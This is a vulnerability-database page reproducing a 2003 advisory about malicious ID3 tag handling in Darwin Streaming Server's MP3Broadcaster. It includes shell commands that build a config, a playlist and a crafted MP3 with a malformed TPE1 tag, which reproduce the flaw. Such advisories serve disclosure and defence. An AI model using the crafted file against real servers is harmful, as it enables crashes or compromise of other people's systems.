Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2003-1091

Publish Date: 22 May 2003

                							

                source: http://www.securityfocus.com/bid/7660/info

MP3Broadcaster is shipped as part of Darwin Streaming Server software.

MP3Broadcaster has been reported prone to a vulnerability when processing malicious ID3 tags. This is likely due to insufficient sanity checks performed when handling signed integer values contained within MP3 file ID3 tags.

First create the sample configuration file:
$ echo -e "\n" &gt; test.conf

Then create a playlist file:
$ echo -e "*PLAY-LIST*\nsong.mp3" &gt; mp3playlist.ply

Create a specially crafted mp3 file:
$ echo -e
"ID3\x03\x00\x00\x00\x00\x0f\x0fTPE1\xff\xaa\xaa\xbb\x00\x00\x00\x00\x00\x00

" &gt; song.mp3

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Apple QuickTime/Darwin Streaming MP3Broadcaster - ID3 Tag Handling

Vulmon Search

About

Products

Connect